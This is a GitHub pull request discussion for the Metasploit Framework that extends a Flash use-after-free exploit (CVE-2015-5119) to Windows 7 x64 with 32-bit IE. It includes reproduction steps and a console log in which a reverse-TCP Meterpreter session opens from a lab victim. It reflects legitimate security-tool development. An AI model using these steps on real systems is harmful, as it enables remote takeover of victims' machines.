
Add support for Windows 7 x64 IE 32bit (CVE-2015-5119 - adobe_flash_hacking_team_uaf) #6525

Closed
wants to merge 2 commits into from

Conversation

ghost

@ghost ghost commented Feb 3, 2016

  • Search ROP gadgets from code section only.
  • Change payload store address to work with win7 x64.

This patch also works well on Win7 x86 IE11 and Win8 x86 IE11.

@wchen-r7
Contributor

wchen-r7 commented Feb 4, 2016

Hi @shin-sugar-yi, I believe your PR is missing an update for https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/CVE-2015-5119/msf.swf (we do it w/ Flex SDK 4.6 + AIR 3.1). Thanks.

@ghost
Author

ghost commented Feb 5, 2016

I did it.

@wchen-r7 wchen-r7 changed the title Add support for Windows 7 x64 IE 32bit Add support for Windows 7 x64 IE 32bit (CVE-2015-5119 - adobe_flash_hacking_team_uaf) Feb 8, 2016
@wchen-r7 wchen-r7 self-assigned this Feb 8, 2016
@wchen-r7
Contributor

wchen-r7 commented Feb 8, 2016

@shin-sugar-yi I'm on a Windows 7 x64 SP1 with IE 11 and Flash 18.0.0.194, but unable to get this patch to work. It just crashes. Please let us know how you'd like to proceed, thanks.

@wchen-r7 wchen-r7 added the blocked Blocked by one or more additional tasks label Feb 8, 2016
@ghost
Author

ghost commented Feb 12, 2016

I can make it work as follows:

  • metasploit v4.11.10-dev-e8cc8181269e6544b7be5e752e2aa4539f294484 (applied my msf.swf)
  • Windows 7 x64 SP1 EN IE11 unpatched and Flash 18.0.0.194 on VMware Workstation
    or
  • Windows 7 x64 SP1 EN IE11 Jan 2016 patched and Flash 18.0.0.194 on VirtualBox

Steps

  • Replace data/exploits/CVE-2015-5119/msf.swf
  • Start msfconsole
  • use exploit/multi/browser/adobe_flash_hacking_team_uaf
  • set PAYLOAD ...
  • run
  • Start IE and access
  • It should get a session
msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf 
msf exploit(adobe_flash_hacking_team_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_hacking_team_uaf) > set LHOST 192.168.56.119
LHOST => 192.168.56.119
msf exploit(adobe_flash_hacking_team_uaf) > set SRVPORT 80
SRVPORT => 80
msf exploit(adobe_flash_hacking_team_uaf) > set URIPATH /
URIPATH => /
msf exploit(adobe_flash_hacking_team_uaf) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.56.119:4444 
[*] Using URL: http://0.0.0.0:80/
msf exploit(adobe_flash_hacking_team_uaf) > [*] Local IP: http://127.0.0.1:80/
[*] Server started.

msf exploit(adobe_flash_hacking_team_uaf) > 
[*] 192.168.56.117   adobe_flash_hacking_team_uaf - Gathering target information.
[*] 192.168.56.117   adobe_flash_hacking_team_uaf - Sending HTML response.
[*] 192.168.56.117   adobe_flash_hacking_team_uaf - Request: /rGaaQS/
[*] 192.168.56.117   adobe_flash_hacking_team_uaf - Sending HTML...
[*] 192.168.56.117   adobe_flash_hacking_team_uaf - Request: /rGaaQS/AsvCG.swf
[*] 192.168.56.117   adobe_flash_hacking_team_uaf - Sending SWF...
[*] Sending stage (957999 bytes) to 192.168.56.117
[*] Meterpreter session 1 opened (192.168.56.119:4444 -> 192.168.56.117:49167) at 2016-02-12 16:59:29 +0900

msf exploit(adobe_flash_hacking_team_uaf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN7X64TJ7XH-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32

@ghost
Author

ghost commented Mar 2, 2016

I am closing this request to improve the reliability of the patch.

@ghost ghost closed this Mar 2, 2016
@ghost ghost deleted the cve-2015-5119-win7x64-ie32bit branch March 2, 2016 06:15
@mkunzsec

Confirmed working on win7 x64 sp1 ie 11 x86 and flash 18.0.0.194, thanks for the pr!

This pull request was closed.
Labels
blocked Blocked by one or more additional tasks enhancement module